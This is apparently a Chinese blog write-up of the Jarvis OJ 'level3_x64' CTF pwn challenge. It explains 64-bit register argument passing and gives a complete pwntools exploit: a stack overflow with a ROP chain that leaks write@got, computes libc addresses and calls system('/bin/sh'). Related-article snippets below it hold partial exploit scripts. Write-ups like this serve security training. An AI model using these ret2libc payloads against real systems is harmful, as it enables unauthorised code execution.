pwn3_x64

最新推荐文章于 2022-04-23 22:17:48 发布
最新推荐文章于 2022-04-23 22:17:48 发布
阅读量275 收藏 1
点赞数
分类专栏: CTF-PWN-刷题-XMCVE培训课 文章标签: PWN 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_49959202/article/details/120365366
版权

文章目录

pwn3_x64

1.程序分析

file一下,发现是64位程序:

checksec一下,发现pie没开:

ldd一下,找到需要的动态链接库:

ida分析:

思路和上一题32位的一样,没啥好分析的

64位与32的不同在于传参:当参数少于7个时, 参数从左到右放入寄存器: rdi, rsi, rdx, rcx, r8, r9

因此需要ROP链找到rdi, rsi, rdx。

用ROPgadget查看下:

发现有现成的pop rdi; ret。

但是没有现成的pop rdx,只有pop rsi。

但是我们只需要write输出的长度大于等于8即可,如果寄存器rdx原来的值就已经大于等于8,我们其实不需要赋值了,到时候recv()时,只接收8字节即可。

gdb调试一下,看调用read()函数时的rdx值:

发现是0x200,那就不需要去pop_ret了。

2.栈帧设计

3.exp编写

from pwn import *

context(os='linux', arch='amd64', log_level='debug')

io = process("/mnt/d/study/ctf/pwn/pwn3_x64/level3_x64")
elf = ELF("/mnt/d/study/ctf/pwn/pwn3_x64/level3_x64")
libc =ELF("/lib/x86_64-linux-gnu/libc.so.6")

write_plt = elf.plt["write"]
write_got = elf.got["write"]
vulnerable_function = elf.symbols["vulnerable_function"]
pop_rdi_ret = 0x00000000004006b3
pop_rsi_r15_ret = 0x00000000004006b1

# rdi, rsi, rdx,
io.recv()
payload = cyclic(0x80 + 8) + p64(pop_rdi_ret) + p64(1) + p64(pop_rsi_r15_ret) + p64(write_got) + p64(0) + p64(write_plt) + p64(vulnerable_function)
io.sendline(payload)
write_real = u64(io.recv(8))

system_real = write_real - libc.symbols["write"] + libc.symbols["system"]
bin_sh_real = write_real - libc.symbols["write"] + next(libc.search(b"/bin/sh"))

payload2 = cyclic(0x80 + 8) + p64(pop_rdi_ret)  + p64(bin_sh_real) + p64(system_real)
io.recv()
io.sendline(payload2)
io.interactive()
(Jarvis Oj)(Pwn) level3_x64
Nothing
04-24 1020
(Jarvis Oj)(Pwn) level3_x64 这题是level3的64位版本,思路和32位版本一致,不同之处就是函数的参数传递,利用寄存器,于是构造rop链。写得脚本如下: from pwn import * ...
Pwn 学习 question_5_plus_x64 ret2csu
MrTreebook的博客
05-01 474
Pwn 学习 question_5_plus_x64 ret2csu1.源代码2.源代码分析3._libc_csu_init 分析4.ROP编程5.ropper看以下gadget6.exp[点击跳转 libc database search](https://libc.blukat.me/)7.看一下效果所有源代码和程序以及调试程序都放在了gitee 1.源代码 #include<stdio.h> #include<stdlib.h> #include<unistd.h>
JarvisOj pwn level3_x64
qq_44813849的博客
07-27 579
JarvisOj pwn level3_x64 这一道题和level3那道题很像,同样是一个压缩包里面有两个文件。 使用ROPgadget搜索操作寄存器的函数地址: 用ida打开level3_x64文件,找到主函数的地址 plt表和got表中的write地址 附上脚本 from pwn import * elf=ELF("level3_x64") write_plt=0x000000000...
BUUCTF(pwn)jarvisoj_level3_x64
半岛铁盒的博客
04-01 496
这道题是一道简单的rop类型的题目,跟之前做的题目有一些差异:( 这是64位的需要一些额外的操作 ) 64位汇编传参,当参数少于7个时, 参数从左到右放入寄存器: rdi, rsi, rdx, rcx, r8, r9。 当参数为7个以上时, 前 6 个与前面一样, 但后面的依次从 “右向左” 放入栈中,即和32位汇编一样。 这里我们使用 write 函数 来泄密 libc地址 ssize_t write(int fd,const void*buf,size_t count); 参数说明: f.
[Jarvis OJ - PWN]——[XMAN]level3_x64
Y_peak的博客
02-08 352
[Jarvis OJ - PWN]——[XMAN]level3_x64 题目地址:https://www.jarvisoj.com/challenges 题目: 老样子,还是先checksec一下,再看看IDA,除了64位以外和[XMAN]level3一样 64位和32位的主要区别就是参数方面,64位当参数小于等于六的时候,是放在寄存器中,没有放在栈上。分别是rdi rsi rdx rcx r8 r9寄存器。所以我们需要找一些pop指令来将参数写入寄存器。 虽然没有找到pop rdx指令,但
[BUUCTF]PWN——jarvisoj_level3_x64
BangSen1的博客
03-17 298
jarvisoj_level3_x64 例行检查,64位,开启NX保护。 运行一下。 IDA打开,查看main函数 function()函数 buf溢出漏洞,read之前已经调用过write函数,利用它来泄露libc版本 64位程序在传参的时候要先用到rdi,rsi,rdx,rcx,r8,r9这几个寄存器,都满了之后才会在栈上传参 利用ROPgadget找一下设置寄存器的指令 rdi=0x4006b3 rsi_r15=0x4006b1 payload='a'*(0x80+8)+p64(rdi)+
BUUCTF PWN get_started_3dsctf_2016
Rt1Text的博客
04-23 414
1.checksec +运行 32位/NX保护 2.32位IDA 1.main函数 gets()函数溢出 跟进v4看看偏移 offset=0x38 这个题有些不同,看看调用函数的汇编 该题没有用ebp寻址,用的是esp寻址 也就是说不需要覆盖ebp四字节 这就说明有时候后卡住回去仔细看看汇编 2.get_flag if ( a1 == 814536271 && a2 == 425138641 ) a1/a2满足条件即可得到flag.tx...
攻防世界 Pwn time_formatter
MrTreebook的博客
03-06 473
攻防世界 Pwn time_formatter1.checksec分析2.IDA分析menu在 print_your_time 找到有关system函数控制好参数ptr即可拿到权限输入限制UAF利用思路3.exp 1.checksec分析 2.IDA分析 menu puts("Welcome to Mary's Unix Time Formatter!"); do { while ( 2 ) { puts("1) Set a time format.");
【广东大学生网络攻防大赛】Pwn | jmp_rsp 题目附件
05-24
"jmp_rsp"源自x86/x64架构中的汇编指令。"jmp"是无条件跳转指令,而"rsp"是寄存器,代表堆栈指针(Stack Pointer)。在执行"jmp rsp"时,程序会跳转到堆栈指针当前指向的地址执行代码。这种技术常用于栈溢出攻击中,...
jarvis oj level pwn level3 和 level2_x64
qq_44813849的博客
07-25 317
level2_x64 x64中的前六个参数依次保存在RDI,RSI,RDX,RCX,R8和 R9中,如果还有更多的参数的话才会保存在栈上。我们要修改寄存器的值就得通过找到例如pop rdi;ret这样的函数,将值放在栈顶。 使用ROPgadget搜索操作寄存器的函数地址: ROPgadget --binary level2_x64 --only "pop|ret" (文件名自己取的) 看一下/...
Jarvis OJ - pwn level3-64
hanqdi_的博客
02-10 330
pwn - level3_x64 检查保护机制 只开启了NX保护,堆栈不可执行保护。 放入ida分析,发现read栈溢出。 思路:没有system和binsh的情况下,在read函数前有write函数运行,可以通过泄漏write函数的地址来泄漏libc版本,从而泄漏system和binsh地址。 泄漏write函数,需要调用write(1,write_got,0x08) ...
夏令营第二周pwn的level-x64题总结
MIGENGKING的博客
07-26 400
今天我来总结一下pwn的level2_x64: 我们直接把题目放进ubuntu虚拟机查看题目: 发现题目的arch模块是64位的;NX保护模式开启,所无法构建shellcode拿到shell/ 接下把文件放进IDAx64分析: ...
ctfshow pwn题学习笔记
Scarehehe的博客
11-30 6689
文章目录pwn入门pwn签到题pwn02 ctfshow pwn学习笔记(除堆部分)本菜逼不会堆 pwn入门 pwn签到题 nc 直接连 pwn02 查看保护 进入pwnme函数 发现fgets处存在栈溢出,s距离ebp为0x9,那么覆盖到返回地址的长度还要再加上0x4我是懒狗,没有gdb看,且程序中存在后门函数,地址为0x804850f exp: from pwn import * io = process("./stack") payload = b"a"*(0x9+0x4)+p32(0x804
[pwn] 6.ROP练习
H4ppyD0g的博客
09-01 403
文章目录pwn0pwn1pwn2pwn2_x64pwn3pwn3_x64 pwn0 经典ret2text,不过是64位程序,覆盖ebp需要8个字节。 from pwn import * elf = ELF('./level0') callsys_addr = elf.symbols['callsystem'] io = process('./level0') io.recvuntil(b'World\n') payload = cyclic(0x80 + 0x8) + p64(0x0000000000
pwn——x64下的格式化字符串
qq_41560595的博客
02-16 616
x64和x86在格式化字符串传参上稍有不同,原因在于x64会把printf函数中的参数先传到6个寄存器中。下面以一道例题说明。 链接:https://pan.baidu.com/s/1fgg6HRr__08fW1P0HgmaKA 提取码:1111 二进制文件拖入IDA并F5 代码吧啦吧啦一大堆,实际上就是让你猜一个flag和真正的flag比对,比对正确会给你flag。= =我要是都知道flag还要你的flag干嘛?! gdb调试 断点断在_isoc99_scanf处,输入AAAA。调试到printf时,查
pwn学习笔记(一)(32位和64位的栈溢出)
weixin_43742794的博客
08-05 2582
32位 32位的栈帧是这样的 栈溢出基本思路是覆盖掉返回地址和参数,执行system()函数从而/bin/sh拿到flag 64位 64位的栈帧也是这样的 但是在 Linux 上,前六个参数通过 RDI 、 RSI 、 RDX 、 RCX 、 R8 和 R9 传递; 而在 Windows 中,前四个参数通过 RCX 、 RDX 、 R8 和 R9 来传递 而第七个(windows下第五个)参数才p...
CTF-浅尝64位栈溢出PWN
热门推荐
BadRer的博客
06-04 1万+
干了一早上终于把这道’难题’做出来了,实在是不容易。头一次完完全全的做出64位的pwn题,如果就栈溢出来说的话,其实感觉和32位的也差不多。至少这方面没有遇到太大的困难,做64位的题对汇编指令的要求就更高了。正好一边做题,一边多学点汇编。 收获是很大的。正文刚开始被一个逻辑漏洞cmp给卡着,一直没有跳到真正产生漏洞的地方,好不容易跳过去了,结果被我自己坑了(写脚本的时候,没有考虑缓冲区的影响,经常
PWNctf的pwn题解析
Peanuts
11-08 8733
  importantservice 这个题目比较简单,保护开的很多多到我怀疑自己是不是把题目想的太简单了,结果果然是这么简单的。。 程序功能分析 main函数分析 main函数的功能并不复杂,开头一个dologic函数对v5这个指针进行一个赋值,然后接着让你输入两个数字,是身高和体重,会有一个check乘积不能大(可能怕你太不匀称
pwn1_sctf_2016
最新发布
02-09
### 关于 PWN1 SCTF 2016 CTF 比赛解题报告 #### 题目概述 PWN1 SCTF 2016 是一次涉及栈溢出漏洞利用的比赛项目。参赛者需理解二进制文件执行流程以及如何通过特定输入控制程序流来实现非授权操作[^2]。 #### 漏洞分析 该挑战主要围绕栈缓冲区溢出展开。当应用程序未能正确验证用户输入长度时,攻击者可以构造恶意数据覆盖堆栈上的返回地址或其他重要变量位置。具体到此案例中,存在一处未受保护的函数调用允许外部输入直接写入固定大小的内存区域而没有任何边界检查机制。 #### 利用方法 为了成功完成这一关卡,选手们通常采用如下策略: - **寻找合适的gadget链**:由于现代操作系统普遍启用了多种防护措施(如NX位),单纯注入shellcode变得困难重重;因此需要找到一系列ROP gadgets组合起来绕过这些限制。 - **泄露 libc 地址**:考虑到目标机器上可能安装有不同版本的标准C库(libc),事先获取其基地址有助于后续精确计算所需偏移量。一种常见做法是先触发格式化字符串错误从而读取got表项中的实际映射位置[^4]。 - **构建 payload**:最终形成的载荷不仅要能够跳转至系统命令解释器(`/bin/sh`)所在处启动交互式终端会话,还要巧妙规避各种随机化技术的影响。这往往涉及到精心安排参数传递顺序并调整寄存器状态以匹配期望环境[^1]。 ```python from pwn import * # 假设已知某些关键信息... elf = ELF(&#39;vuln_binary&#39;) libc = ELF(&#39;/path/to/libc.so&#39;) # 远程连接或本地调试设置 conn = remote(&#39;target_host&#39;, port) # 发送初始输入引发泄漏 conn.sendlineafter(b&#39;> &#39;, b&#39;%7$s&#39; + cyclic(8)) leak_data = conn.recvuntil(&#39;\n&#39;).strip() # 处理泄露出的数据得到libc基址 base_addr = u64(leak_data.ljust(8, b&#39;\x00&#39;)) - libc.symbols[&#39;puts&#39;] log.info(f"Leaked base address: {hex(base_addr)}") # 构造用于执行/bin/sh的有效负载 payload = flat([ ... # 此处省略具体细节 ]) conn.interactive() ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值